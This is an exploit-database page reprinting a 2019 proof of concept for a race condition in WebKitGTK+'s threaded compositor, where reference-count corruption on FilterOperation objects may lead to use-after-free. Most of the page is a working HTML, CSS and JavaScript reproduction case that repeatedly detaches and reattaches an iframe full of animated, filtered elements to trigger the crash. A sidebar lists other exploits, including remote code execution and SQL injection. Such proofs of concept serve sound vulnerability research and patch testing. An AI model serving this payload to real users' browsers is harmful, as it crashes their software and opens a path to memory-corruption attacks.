Webkitgtk+ threadedcompositor race condition Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-04-03 | Type : dos | Platform : multiple
This exploit / vulnerability Webkitgtk+ threadedcompositor race condition is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

<!--
VULNERABILITY DETAILS
The compositor thread in WebKitGTK+ might alter a FilterOperation object's reference count variable at the same time as the main thread. Then the reference count corruption might lead to a UAF condition.


REPRODUCTION CASE
-->

<html>
<style>
@keyframes foo {
0% { opacity: 0; }
100% { opacity: 1; }
}

div {
animation-name: foo;
animation-duration: 1s;
animation-iteration-count: infinite;
filter: saturate(50%);
}
</style>
<body>
<script>
frame = document.createElement("iframe");

setInterval(_ => {
frame.remove();
document.body.appendChild(frame);

doc = frame.contentDocument;
doc.head.appendChild(document.querySelector("style").cloneNode(true));

elt = document.createElement("div");
elt.textContent = "foo";
let elements = [];

for (let i = 0, count = Math.random() * 50; i < count; ++i) {
elements[i] = doc.body.appendChild(elt.cloneNode(true));
elements[i].clientWidth;
}
}, Math.random() * 500);
</script>
</body>
</html>

<!--
VERSION
Reproduced on WebKitGTK+ build revision 240647.
This bug doesn't seem to affect WebKit on macOS/iOS.
-->

Webkitgtk+ threadedcompositor race condition


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Webkitgtk+ threadedcompositor race condition Vulnerability / Exploit